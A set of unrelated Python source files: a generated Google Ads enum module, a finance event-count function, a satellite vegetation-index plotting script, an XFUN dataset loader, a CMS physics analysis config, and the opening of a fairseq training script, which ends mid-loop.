    _descriptor.EnumValueDescriptor(
      name='PROPERTY_NAME', index=3, number=3,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='DESTINATION_NAME', index=4, number=4,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='DESCRIPTION', index=5, number=5,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='ADDRESS', index=6, number=6,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='PRICE', index=7, number=7,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='FORMATTED_PRICE', index=8, number=8,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='SALE_PRICE', index=9, number=9,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='FORMATTED_SALE_PRICE', index=10, number=10,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='IMAGE_URL', index=11, number=11,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='CATEGORY', index=12, number=12,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='STAR_RATING', index=13, number=13,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='CONTEXTUAL_KEYWORDS', index=14, number=14,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='FINAL_URLS', index=15, number=15,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='FINAL_MOBILE_URLS', index=16, number=16,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='TRACKING_URL', index=17, number=17,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='ANDROID_APP_LINK', index=18, number=18,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='SIMILAR_PROPERTY_IDS', index=19, number=19,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='IOS_APP_LINK', index=20, number=20,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='IOS_APP_STORE_ID', index=21, number=21,
      serialized_options=None,
      type=None),
  ],
  containing_type=None,
  serialized_options=None,
  serialized_start=161,
  serialized_end=592,
)
_sym_db.RegisterEnumDescriptor(_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD)
# Descriptor for the wrapper message; the enum above is nested inside it.
_HOTELPLACEHOLDERFIELDENUM = _descriptor.Descriptor(
  name='HotelPlaceholderFieldEnum',
  full_name='google.ads.googleads.v3.enums.HotelPlaceholderFieldEnum',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
    _HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD,
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=131,
  serialized_end=592,
)
_HOTELPLACEHOLDERFIELDENUM_HOTELPLACEHOLDERFIELD.containing_type = _HOTELPLACEHOLDERFIELDENUM
DESCRIPTOR.message_types_by_name['HotelPlaceholderFieldEnum'] = _HOTELPLACEHOLDERFIELDENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
HotelPlaceholderFieldEnum = _reflection.GeneratedProtocolMessageType('HotelPlaceholderFieldEnum', (_message.Message,), dict(
DESCRIPTOR = _HOTELPLACEHOLDERFIELDENUM,
__module__ = 'google.ads.googleads_v3.proto.enums.hotel_placeholder_field_pb2'
,
__doc__ = """Values for Hotel placeholder fields. For more information about dynamic
remarketing feeds, see
https://support.google.com/google-ads/answer/6053288.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.enums.HotelPlaceholderFieldEnum)
))
_sym_db.RegisterMessage(HotelPlaceholderFieldEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
import pandas as pd
import numpy as np
from adv_finance.multiprocess import mp_pandas_obj
def mp_num_co_events(timestamps, t1, molecule):
    """
    Snippet 4.1 (page 60) Estimating The Uniqueness Of A Label
    Compute the number of concurrent events per bar.

    + molecule[0] is the date of the first event on which the weight will be computed
    + molecule[-1] is the date of the last event on which the weight will be computed

    Any event that starts before t1[molecule].max() impacts the count.

    :param timestamps: pd.DatetimeIndex of bar timestamps
    :param t1: pd.Series of event end times indexed by event start time
    :param molecule: subset of t1's index to compute counts for
    :return: pd.Series of concurrent event counts indexed by bar timestamp
    """
    # 1) Find events that span the period [molecule[0], molecule[-1]]
    t1 = t1.fillna(timestamps[-1])  # unclosed events still must impact other weights
    t1 = t1[t1 >= molecule[0]]  # events that end at or after molecule[0]
    # Cap the window at the last known bar so the .loc slice cannot overrun.
    t1_end = min(t1[molecule].max(), t1.index[-1])
    t1 = t1.loc[:t1_end]  # events that start at or before t1[molecule].max()

    # 2) Count events spanning a bar
    iloc = timestamps.searchsorted(np.array([t1.index[0], t1.max()]))
    count = pd.Series(0, index=timestamps[iloc[0]:iloc[1] + 1])
    # Bug fix: Series.iteritems() was removed in pandas 2.0; items() is the
    # supported equivalent on all modern pandas versions.
    for t_in, t_out in t1.items():
        count.loc[t_in:t_out] += 1
    return count.loc[molecule[0]:t1[molecule].max()]
def get_num_co_events(timestamps, t1, num_threads=1):
    """Compute concurrent event counts, fanned out over worker processes.

    :param timestamps: bar timestamps
    :param t1: series of event end times indexed by event start
    :param num_threads: worker count handed to the multiprocessing helper
    :return: concurrent event counts per bar
    """
    molecule_spec = ('molecule', t1.index)
    return mp_pandas_obj(
        mp_num_co_events,
        molecule_spec,
        num_threads,
        timestamps=timestamps,
        t1=t1,
    )
|
####
#### July 2. This is a copy of the version we had from before. plotting one year.
#### Here we are extending it to 2 years. Since August of a given year to the end
#### of the next year.
####
"""
Just generate peak plots for Grant 2017 fields
for all cultivars; EVI and my peak finder
"""
import matplotlib.backends.backend_pdf
import csv
import numpy as np
import pandas as pd
# import geopandas as gpd
from IPython.display import Image
# from shapely.geometry import Point, Polygon
from math import factorial
import datetime
import time
import scipy
import scipy.signal
import os, os.path
import matplotlib
from statsmodels.sandbox.regression.predstd import wls_prediction_std
from sklearn.linear_model import LinearRegression
from patsy import cr
# from pprint import pprint
import matplotlib.pyplot as plt
import seaborn as sb
from pandas.plotting import register_matplotlib_converters
# Needed so matplotlib can plot pandas datetime values directly.
register_matplotlib_converters()
import sys
start_time = time.time()

# Module search paths (see
# https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path):
# the local (laptop) core path and the Aeolus cluster core path; whichever
# exists provides the remote_sensing modules imported below.
sys.path.append('/Users/hn/Documents/00_GitHub/Ag/remote_sensing/python/')
sys.path.append('/home/hnoorazar/remote_sensing_codes/')

# Import remote cores.
import remote_sensing_core as rc
import remote_sensing_plot_core as rcp

####################################################################################
###
### Parameters
###
####################################################################################
eleven_colors = ["gray", "lightcoral", "red", "peru",
                 "darkorange", "gold", "olive", "green",
                 "blue", "violet", "deepskyblue"]

# Parameters come from the command line; examples of the fixed values
# they replace:
# indeks = "EVI"
# irrigated_only = 1
# SF_year = 2017
given_county = "Grant"
jumps = sys.argv[1]               # "yes" selects the jump-corrected series
indeks = sys.argv[2]              # vegetation index name, e.g. "EVI"
irrigated_only = int(sys.argv[3])  # 1 = irrigated fields only
SF_year = int(sys.argv[4])        # shapefile year
regularized = True

####################################################################################
###
### Aeolus Directories
###
####################################################################################
if irrigated_only == True:
    output_Irr = "irrigated_only"
else:
    output_Irr = "non_irrigated_only"

regular_data_dir = "/data/hydro/users/Hossein/remote_sensing/03_Regularized_TS/70_cloud/2Yrs/"
if jumps == "yes":
    regular_output_dir = "/data/hydro/users/Hossein/remote_sensing/04_RegularFilledGaps_plots_tbls/2Yrs_plots_70Cloud_Regular_wJumps/" + \
                         given_county + "_" + str(SF_year) + "_regular_" + output_Irr + "_" + indeks + "/"
    f_name = "01_Regular_filledGap_" + given_county + "_SF_" + str(SF_year) + "_" + indeks + ".csv"
else:
    regular_data_dir = regular_data_dir + "/noJump_Regularized/"
    regular_output_dir = "/data/hydro/users/Hossein/remote_sensing/04_RegularFilledGaps_plots_tbls/2Yrs_plots_70Cloud_Regular_noJumps/" + \
                         given_county + "_" + str(SF_year) + "_regular_" + output_Irr + "_" + indeks + "/"
    f_name = "01_Regular_filledGap_" + given_county + "_SF_" + str(SF_year) + "_" + indeks + ".csv"

plot_dir_base = regular_output_dir
print ("plot_dir_base is " + plot_dir_base)
param_dir = "/home/hnoorazar/remote_sensing_codes/parameters/"
#####################################################################################
# Aliases actually used below; plot_dir_base is deliberately re-assigned.
data_dir = regular_data_dir
output_dir = regular_output_dir
plot_dir_base = output_dir
print ("plot_dir_base is " + plot_dir_base)
os.makedirs(output_dir, exist_ok=True)
os.makedirs(plot_dir_base, exist_ok=True)
print ("_________________________________________________________")
print ("data dir is:")
print (data_dir)
print ("_________________________________________________________")
print ("output_dir is:")
print (output_dir)
print ("_________________________________________________________")

####################################################################################
###
### Read data
###
####################################################################################
a_df = pd.read_csv(data_dir + f_name, low_memory=False)

# Plots have to be exact, so drop NASS rows and filter by last survey date.
a_df = a_df[a_df['county'] == given_county]  # Filter Grant
a_df = rc.filter_out_NASS(a_df)  # Toss NASS
a_df = rc.filter_by_lastSurvey(a_df, year = SF_year)  # filter by last survey date
a_df['SF_year'] = SF_year
# a_df = a_df[a_df['image_year'] == SF_year]

# Keep either only irrigated or only non-irrigated fields.
if irrigated_only == True:
    a_df = rc.filter_out_nonIrrigated(a_df)
    output_Irr = "irrigated_only"
else:
    output_Irr = "non_irrigated_only"
    a_df = rc.filter_out_Irrigated(a_df)

# The following columns do not exist in the old data; default them to "NA".
if not('DataSrc' in a_df.columns):
    print ("Data source is being set to NA")
    a_df['DataSrc'] = "NA"
if not('CovrCrp' in a_df.columns):
    print ("CovrCrp is being set to NA")
    a_df['CovrCrp'] = "NA"

# Index-specific cleaning.
if (indeks == "EVI"):
    a_df = rc.initial_clean_EVI(a_df)
    print ("initial_clean_EVI")
else:
    a_df = rc.initial_clean_NDVI(a_df)
    print ("initial_clean_NDVI")

an_EE_TS = a_df.copy()
del(a_df)

### List of unique polygons
polygon_list = np.sort(an_EE_TS['ID'].unique())
print ("_____________________________________")
print("len(polygon_list)")
print (len(polygon_list))
print ("_____________________________________")
counter = 0

# One 2x2 panel figure per field polygon, grouped by crop type.
for a_poly in polygon_list:
    if (counter % 1000 == 0):
        print ("_____________________________________")
        print ("counter: " + str(counter))

    curr_field = an_EE_TS[an_EE_TS['ID'] == a_poly].copy()

    # Sort by year then day-of-year (sanity check; plotting assumes order).
    curr_field.sort_values(by=['image_year', 'doy'], inplace=True)

    ID = curr_field['ID'].unique()[0]

    # Sanitize the crop-type string into a safe directory/file component.
    plant = curr_field['CropTyp'].unique()[0]
    plant = plant.replace("/", "_")
    plant = plant.replace(",", "_")
    plant = plant.replace(" ", "_")
    plant = plant.replace("__", "_")

    county = curr_field['county'].unique()[0]

    sub_out = plant + "/"  # "/plant_based_plots/" + plant + "/"
    plot_path = plot_dir_base + sub_out
    os.makedirs(plot_path, exist_ok=True)
    # print ("plot_path is " + plot_path)

    # Only produce up to 100 example plots per crop type.
    if (len(os.listdir(plot_path)) < 100):
        # Set up canvas: 2x2 grid, one panel per delta threshold.
        fig, axs = plt.subplots(2, 2, figsize=(20, 12),
                                sharex='col', sharey='row',
                                gridspec_kw={'hspace': 0.1, 'wspace': .1})
        (ax1, ax2), (ax3, ax4) = axs
        ax1.grid(True)
        ax2.grid(True)
        ax3.grid(True)
        ax4.grid(True)

        rcp.savitzky_2yrs_panel(crr_fld=curr_field, idx=indeks, deltA=0.1, SFYr=SF_year, ax=ax1)
        rcp.savitzky_2yrs_panel(crr_fld=curr_field, idx=indeks, deltA=0.2, SFYr=SF_year, ax=ax2)
        rcp.savitzky_2yrs_panel(crr_fld=curr_field, idx=indeks, deltA=0.3, SFYr=SF_year, ax=ax3)
        rcp.savitzky_2yrs_panel(crr_fld=curr_field, idx=indeks, deltA=0.4, SFYr=SF_year, ax=ax4)

        fig_name = plot_path + county + "_" + plant + "_SF_year_" + str(SF_year) + "_" + ID + '.png'
        plt.savefig(fname=fig_name, dpi=250, bbox_inches='tight')
        # Bug fix: close the figure; otherwise thousands of open figures
        # accumulate over the run and exhaust memory.
        plt.close(fig)

    counter += 1

print ("done")
end_time = time.time()
print(end_time - start_time)
|
# Lint as: python3
import json
import logging
import os
import datasets
from layoutlmft.data.utils import load_image, merge_bbox, normalize_bbox, simplify_bbox
from transformers import AutoTokenizer
# Base URL of the released XFUN v1.0 data files.
_URL = "https://github.com/doc-analysis/XFUN/releases/download/v1.0/"
# Languages covered by the dataset.
_LANG = ["zh", "de", "es", "fr", "en", "it", "ja", "pt"]
logger = logging.getLogger(__name__)
class XFUNConfig(datasets.BuilderConfig):
    """BuilderConfig for XFUN."""

    def __init__(self, lang, additional_langs=None, **kwargs):
        """
        Args:
            lang: string, language for the input text
            additional_langs: optional "+"-separated extra training languages
            **kwargs: keyword arguments forwarded to super.
        """
        super(XFUNConfig, self).__init__(**kwargs)
        # Primary language, plus any extra languages mixed into training.
        self.additional_langs = additional_langs
        self.lang = lang
class XFUN(datasets.GeneratorBasedBuilder):
    """XFUN dataset builder: multilingual form understanding examples with
    token ids, layout boxes, BIO labels, entity spans and key/value relations.
    """

    # One config per supported language.
    BUILDER_CONFIGS = [XFUNConfig(name=f"xfun.{lang}", lang=lang) for lang in _LANG]

    # Shared subword tokenizer used for every language.
    tokenizer = AutoTokenizer.from_pretrained("xlm-roberta-base")

    def _info(self):
        """Declare the feature schema of the generated examples."""
        return datasets.DatasetInfo(
            features=datasets.Features(
                {
                    "id": datasets.Value("string"),
                    "input_ids": datasets.Sequence(datasets.Value("int64")),
                    # One [x0, y0, x1, y1] box per token.
                    "bbox": datasets.Sequence(datasets.Sequence(datasets.Value("int64"))),
                    "labels": datasets.Sequence(
                        datasets.ClassLabel(
                            names=["O", "B-QUESTION", "B-ANSWER", "B-HEADER", "I-ANSWER", "I-QUESTION", "I-HEADER"]
                        )
                    ),
                    "image": datasets.Array3D(shape=(3, 224, 224), dtype="uint8"),
                    "entities": datasets.Sequence(
                        {
                            "start": datasets.Value("int64"),
                            "end": datasets.Value("int64"),
                            "label": datasets.ClassLabel(names=["HEADER", "QUESTION", "ANSWER"]),
                        }
                    ),
                    "relations": datasets.Sequence(
                        {
                            "head": datasets.Value("int64"),
                            "tail": datasets.Value("int64"),
                            "start_index": datasets.Value("int64"),
                            "end_index": datasets.Value("int64"),
                        }
                    ),
                }
            ),
            supervised_keys=None,
        )

    def _split_generators(self, dl_manager):
        """Returns SplitGenerators."""
        # Each split needs the JSON annotations plus the zipped images.
        urls_to_download = {
            "train": [f"{_URL}{self.config.lang}.train.json", f"{_URL}{self.config.lang}.train.zip"],
            "val": [f"{_URL}{self.config.lang}.val.json", f"{_URL}{self.config.lang}.val.zip"],
            # "test": [f"{_URL}{self.config.lang}.test.json", f"{_URL}{self.config.lang}.test.zip"],
        }
        downloaded_files = dl_manager.download_and_extract(urls_to_download)
        train_files_for_many_langs = [downloaded_files["train"]]
        val_files_for_many_langs = [downloaded_files["val"]]
        # test_files_for_many_langs = [downloaded_files["test"]]
        # Optionally mix additional languages into the training split;
        # "all" expands to every language except the primary one.
        if self.config.additional_langs:
            additional_langs = self.config.additional_langs.split("+")
            if "all" in additional_langs:
                additional_langs = [lang for lang in _LANG if lang != self.config.lang]
            for lang in additional_langs:
                urls_to_download = {"train": [f"{_URL}{lang}.train.json", f"{_URL}{lang}.train.zip"]}
                additional_downloaded_files = dl_manager.download_and_extract(urls_to_download)
                train_files_for_many_langs.append(additional_downloaded_files["train"])
        logger.info(f"Training on {self.config.lang} with additional langs({self.config.additional_langs})")
        logger.info(f"Evaluating on {self.config.lang}")
        logger.info(f"Testing on {self.config.lang}")
        return [
            datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepaths": train_files_for_many_langs}),
            datasets.SplitGenerator(
                name=datasets.Split.VALIDATION, gen_kwargs={"filepaths": val_files_for_many_langs}
            ),
            # datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={"filepaths": test_files_for_many_langs}),
        ]

    def _generate_examples(self, filepaths):
        """Yield (key, example) pairs; documents are emitted in 512-token chunks."""
        for filepath in filepaths:
            logger.info("Generating examples from = %s", filepath)
            # filepath[0] is the JSON annotation file, filepath[1] the image dir.
            with open(filepath[0], "r") as f:
                data = json.load(f)
            for doc in data["documents"]:
                doc["img"]["fpath"] = os.path.join(filepath[1], doc["img"]["fname"])
                image, size = load_image(doc["img"]["fpath"])
                document = doc["document"]
                tokenized_doc = {"input_ids": [], "bbox": [], "labels": []}
                entities = []
                relations = []
                id2label = {}
                entity_id_to_index_map = {}
                empty_entity = set()
                for line in document:
                    # Lines with no text cannot anchor a relation; remember
                    # their ids so relations touching them are dropped later.
                    if len(line["text"]) == 0:
                        empty_entity.add(line["id"])
                        continue
                    id2label[line["id"]] = line["label"]
                    relations.extend([tuple(sorted(l)) for l in line["linking"]])
                    tokenized_inputs = self.tokenizer(
                        line["text"],
                        add_special_tokens=False,
                        return_offsets_mapping=True,
                        return_attention_mask=False,
                    )
                    # Walk tokens and OCR words in parallel, merging the OCR
                    # word boxes that cover each token's characters.
                    text_length = 0
                    ocr_length = 0
                    bbox = []
                    for token_id, offset in zip(tokenized_inputs["input_ids"], tokenized_inputs["offset_mapping"]):
                        # Token id 6 gets no box of its own; its slot is
                        # back-filled from the following token afterwards
                        # (presumably the XLM-R whitespace piece — TODO confirm).
                        if token_id == 6:
                            bbox.append(None)
                            continue
                        text_length += offset[1] - offset[0]
                        tmp_box = []
                        while ocr_length < text_length:
                            ocr_word = line["words"].pop(0)
                            ocr_length += len(
                                self.tokenizer._tokenizer.normalizer.normalize_str(ocr_word["text"].strip())
                            )
                            tmp_box.append(simplify_bbox(ocr_word["box"]))
                        # NOTE(review): if the very first real token yields an
                        # empty tmp_box, last_box is unbound here (NameError);
                        # presumably the data guarantees a non-empty first
                        # box — TODO confirm.
                        if len(tmp_box) == 0:
                            tmp_box = last_box
                        bbox.append(normalize_bbox(merge_bbox(tmp_box), size))
                        last_box = tmp_box  # noqa
                    # Replace placeholder boxes (None) with a degenerate box
                    # at the next token's top-left corner.
                    bbox = [
                        [bbox[i + 1][0], bbox[i + 1][1], bbox[i + 1][0], bbox[i + 1][1]] if b is None else b
                        for i, b in enumerate(bbox)
                    ]
                    # BIO-tag the line's tokens from its entity label.
                    if line["label"] == "other":
                        label = ["O"] * len(bbox)
                    else:
                        label = [f"I-{line['label'].upper()}"] * len(bbox)
                        label[0] = f"B-{line['label'].upper()}"
                    tokenized_inputs.update({"bbox": bbox, "labels": label})
                    if label[0] != "O":
                        entity_id_to_index_map[line["id"]] = len(entities)
                        entities.append(
                            {
                                "start": len(tokenized_doc["input_ids"]),
                                "end": len(tokenized_doc["input_ids"]) + len(tokenized_inputs["input_ids"]),
                                "label": line["label"].upper(),
                            }
                        )
                    for i in tokenized_doc:
                        tokenized_doc[i] = tokenized_doc[i] + tokenized_inputs[i]
                # Deduplicate links and drop those touching empty lines.
                relations = list(set(relations))
                relations = [rel for rel in relations if rel[0] not in empty_entity and rel[1] not in empty_entity]
                kvrelations = []
                # Keep only question/answer pairs, oriented question -> answer.
                for rel in relations:
                    pair = [id2label[rel[0]], id2label[rel[1]]]
                    if pair == ["question", "answer"]:
                        kvrelations.append(
                            {"head": entity_id_to_index_map[rel[0]], "tail": entity_id_to_index_map[rel[1]]}
                        )
                    elif pair == ["answer", "question"]:
                        kvrelations.append(
                            {"head": entity_id_to_index_map[rel[1]], "tail": entity_id_to_index_map[rel[0]]}
                        )
                    else:
                        continue

                def get_relation_span(rel):
                    # Token span covered by both endpoints of a relation.
                    bound = []
                    for entity_index in [rel["head"], rel["tail"]]:
                        bound.append(entities[entity_index]["start"])
                        bound.append(entities[entity_index]["end"])
                    return min(bound), max(bound)

                relations = sorted(
                    [
                        {
                            "head": rel["head"],
                            "tail": rel["tail"],
                            "start_index": get_relation_span(rel)[0],
                            "end_index": get_relation_span(rel)[1],
                        }
                        for rel in kvrelations
                    ],
                    key=lambda x: x["head"],
                )
                # Emit fixed-size chunks with entity/relation indices
                # remapped to be chunk-local; entities/relations that do not
                # fall entirely inside a chunk are dropped from it.
                chunk_size = 512
                for chunk_id, index in enumerate(range(0, len(tokenized_doc["input_ids"]), chunk_size)):
                    item = {}
                    for k in tokenized_doc:
                        item[k] = tokenized_doc[k][index : index + chunk_size]
                    entities_in_this_span = []
                    global_to_local_map = {}
                    for entity_id, entity in enumerate(entities):
                        if (
                            index <= entity["start"] < index + chunk_size
                            and index <= entity["end"] < index + chunk_size
                        ):
                            entity["start"] = entity["start"] - index
                            entity["end"] = entity["end"] - index
                            global_to_local_map[entity_id] = len(entities_in_this_span)
                            entities_in_this_span.append(entity)
                    relations_in_this_span = []
                    for relation in relations:
                        if (
                            index <= relation["start_index"] < index + chunk_size
                            and index <= relation["end_index"] < index + chunk_size
                        ):
                            relations_in_this_span.append(
                                {
                                    "head": global_to_local_map[relation["head"]],
                                    "tail": global_to_local_map[relation["tail"]],
                                    "start_index": relation["start_index"] - index,
                                    "end_index": relation["end_index"] - index,
                                }
                            )
                    item.update(
                        {
                            "id": f"{doc['id']}_{chunk_id}",
                            "image": image,
                            "entities": entities_in_this_span,
                            "relations": relations_in_this_span,
                        }
                    )
                    yield f"{doc['id']}_{chunk_id}", item
|
import FWCore.ParameterSet.Config as cms
# CMSSW configuration: run the GammaJetAnalysis analyzer over 2012 photon data
# (CHS jets, no GammaJetProd producer upstream).
process = cms.Process('ANALYSIS')
process.load('Configuration.StandardSequences.Services_cff')
# Specify IdealMagneticField ESSource (needed for CMSSW 730)
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.autoCond import autoCond
# conditions: automatic global tag for Run1 data
process.GlobalTag.globaltag=autoCond['run1_data']
process.load('FWCore.MessageService.MessageLogger_cfi')
process.MessageLogger.GammaJetAnalysis=dict()
# throttle framework progress reports to one per 1000 events
process.MessageLogger.cerr.FwkReport.reportEvery=cms.untracked.int32(1000)
#load the analyzer
process.load('Calibration.HcalCalibAlgos.gammaJetAnalysis_cfi')
# load energy corrector
process.load('JetMETCorrections.Configuration.JetCorrectionProducers_cff')
# run over files
process.GammaJetAnalysis.rootHistFilename = cms.string('PhoJet_tree_CHS_data2012_noGJetProd.root')
process.GammaJetAnalysis.doPFJets = cms.bool(True)
process.GammaJetAnalysis.doGenJets = cms.bool(False)
# TFileService writes to the same file name as rootHistFilename above
process.TFileService = cms.Service("TFileService",
                       fileName = cms.string('PhoJet_tree_CHS_data2012_noGJetProd.root'))
# trigger names should not end with '_'
process.GammaJetAnalysis.photonTriggers = cms.vstring(
    'HLT_Photon20_CaloIdVL_IsoL','HLT_Photon30_CaloIdVL_IsoL',
    'HLT_Photon50_CaloIdVL_IsoL','HLT_Photon75_CaloIdVL_IsoL',
    'HLT_Photon90_CaloIdVL_IsoL','HLT_Photon135',
    'HLT_Photon150','HLT_Photon160')
# triggers for CMSSW 730
process.GammaJetAnalysis.photonTriggers += cms.vstring(
    'HLT_Photon22', 'HLT_Photon30', 'HLT_Photon36',
    'HLT_Photon50', 'HLT_Photon75',
    'HLT_Photon90', 'HLT_Photon120', 'HLT_Photon175',
    'HLT_Photon250_NoHE', 'HLT_Photon300_NoHE'
)
# to disable photonTriggers assign an empty vstring
#process.GammaJetAnalysis.photonTriggers = cms.vstring()
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring(
        'file:/tmp/andriusj/Run2012A_Photon_22Jan2013-002618943913.root'
    )
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False) )
# Load jets and pfNoPileUP
process.load('RecoJets.Configuration.RecoPFJets_cff')
process.load('CommonTools.ParticleFlow.PF2PAT_cff')
process.load("CommonTools.ParticleFlow.pfNoPileUp_cff")
# sequence that rebuilds AK4 CHS PF jets before the analyzer runs
process.seq_ak4PFCHS= cms.Sequence( process.particleFlowPtrs *
                                    process.pfNoPileUpJMESequence *
                                    process.ak4PFJetsCHS )
# adapt input collections
process.GammaJetAnalysis.photonCollName= cms.string("photons")
process.GammaJetAnalysis.electronCollName= cms.string("gsfElectrons")
process.GammaJetAnalysis.photonIdLooseName= cms.InputTag("PhotonIDProd","PhotonCutBasedIDLoose")
process.GammaJetAnalysis.photonIdTightName= cms.InputTag("PhotonIDProd","PhotonCutBasedIDTight")
# name of the process that used the GammaJetProd producer
#process.GammaJetAnalysis.prodProcess = cms.untracked.string('MYGAMMAJET')
# specify 'workOnAOD=2' to apply tokens from GammaJetProd producer
process.GammaJetAnalysis.workOnAOD = cms.int32(0)
# NOTE(review): doGenJets is also set to False earlier in this file; the
# duplicate assignment is harmless but one of the two could be dropped
process.GammaJetAnalysis.doGenJets = cms.bool(False)
process.GammaJetAnalysis.debug = cms.untracked.int32(0)
process.p = cms.Path(
    process.seq_ak4PFCHS *
    process.GammaJetAnalysis
)
|
#!/usr/bin/env python3 -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Train a new model on one or across multiple GPUs.
"""
import collections
import math
import random
import numpy as np
import torch
from fairseq import checkpoint_utils, distributed_utils, options, progress_bar, tasks, utils
from fairseq.data import iterators
from fairseq.trainer import Trainer
from fairseq.meters import AverageMeter, StopwatchMeter
def main(args, init_distributed=False):
    """Top-level training entry point.

    Sets up the task, model, criterion and trainer, restores the latest
    checkpoint if present, then alternates train/validate epochs until the
    learning rate, max-epoch or max-update stopping bound is reached.

    Args:
        args: parsed fairseq training arguments.
        init_distributed: when True, initialize torch.distributed before
            training (set by distributed_main for multi-process runs).
    """
    utils.import_user_module(args)
    assert args.max_tokens is not None or args.max_sentences is not None, \
        'Must specify batch size either with --max-tokens or --max-sentences'
    # Initialize CUDA and distributed training
    if torch.cuda.is_available() and not args.cpu:
        torch.cuda.set_device(args.device_id)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if init_distributed:
        args.distributed_rank = distributed_utils.distributed_init(args)
    # only the master process touches the checkpoint directory
    if distributed_utils.is_master(args):
        checkpoint_utils.verify_checkpoint_directory(args.save_dir)
    # Print args
    print(args)
    # Setup task, e.g., translation, language modeling, etc.
    task = tasks.setup_task(args)
    # Load valid dataset (we load training data below, based on the latest checkpoint)
    for valid_sub_split in args.valid_subset.split(','):
        task.load_dataset(valid_sub_split, combine=False, epoch=0)
    # Build model and criterion
    generator = task.build_model(args)
    criterion = task.build_criterion(args)
    print(generator)
    print('| model {}, criterion {}'.format(args.arch, criterion.__class__.__name__))
    print('| num. model params: {} (num. trained: {})'.format(
        sum(p.numel() for p in generator.parameters()),
        sum(p.numel() for p in generator.parameters() if p.requires_grad),
    ))
    # Build trainer
    trainer = Trainer(args, task, generator, criterion)
    print('| training on {} GPUs'.format(args.distributed_world_size))
    print('| max tokens per GPU = {} and max sentences per GPU = {}'.format(
        args.max_tokens,
        args.max_sentences,
    ))
    # Load the latest checkpoint if one is available and restore the
    # corresponding train iterator
    extra_state, epoch_itr = checkpoint_utils.load_checkpoint(args, trainer)
    # Train until the learning rate gets too small
    max_epoch = args.max_epoch or math.inf
    max_update = args.max_update or math.inf
    lr = trainer.get_lr()
    train_meter = StopwatchMeter()
    train_meter.start()
    valid_subsets = args.valid_subset.split(',')
    while (
        lr > args.min_lr
        # NOTE(review): peeks at the private _next_epoch_itr to allow one final
        # partial epoch at max_epoch — relies on iterator internals; confirm
        and (epoch_itr.epoch < max_epoch or (epoch_itr.epoch == max_epoch
            and epoch_itr._next_epoch_itr is not None))
        and trainer.get_num_updates() < max_update
    ):
        # train for one epoch
        train(args, trainer, task, epoch_itr)
        if not args.disable_validation and epoch_itr.epoch % args.validate_interval == 0:
            valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets)
        else:
            valid_losses = [None]
        # only use first validation loss to update the learning rate
        lr = trainer.lr_step(epoch_itr.epoch, valid_losses[0])
        # save checkpoint
        if epoch_itr.epoch % args.save_interval == 0:
            checkpoint_utils.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])
        # a ':' in the data path marks sharded data that must be reloaded each epoch
        reload_dataset = ':' in getattr(args, 'data', '')
        # sharded data: get train iterator for next epoch
        epoch_itr = trainer.get_train_iterator(epoch_itr.epoch, load_dataset=reload_dataset)
    train_meter.stop()
    print('| done training in {:.1f} seconds'.format(train_meter.sum))
def train(args, trainer, task, epoch_itr):
    """Train the model for one epoch.

    Iterates the epoch's batches (grouped by update_freq for gradient
    accumulation), logs per-update and end-of-epoch stats, and optionally
    validates/saves a checkpoint every args.save_interval_updates updates.
    """
    # Update parameters every N batches
    update_freq = args.update_freq[epoch_itr.epoch - 1] \
        if epoch_itr.epoch <= len(args.update_freq) else args.update_freq[-1]
    # Initialize data iterator
    itr = epoch_itr.next_epoch_itr(
        fix_batches_to_gpus=args.fix_batches_to_gpus,
        shuffle=(epoch_itr.epoch >= args.curriculum),
    )
    # group update_freq consecutive batches so gradients accumulate across them
    itr = iterators.GroupedIterator(itr, update_freq)
    progress = progress_bar.build_progress_bar(
        args, itr, epoch_itr.epoch, no_progress_bar='simple',
    )
    extra_meters = collections.defaultdict(lambda: AverageMeter())
    valid_subsets = args.valid_subset.split(',')
    max_update = args.max_update or math.inf
    for i, samples in enumerate(progress, start=epoch_itr.iterations_in_epoch):
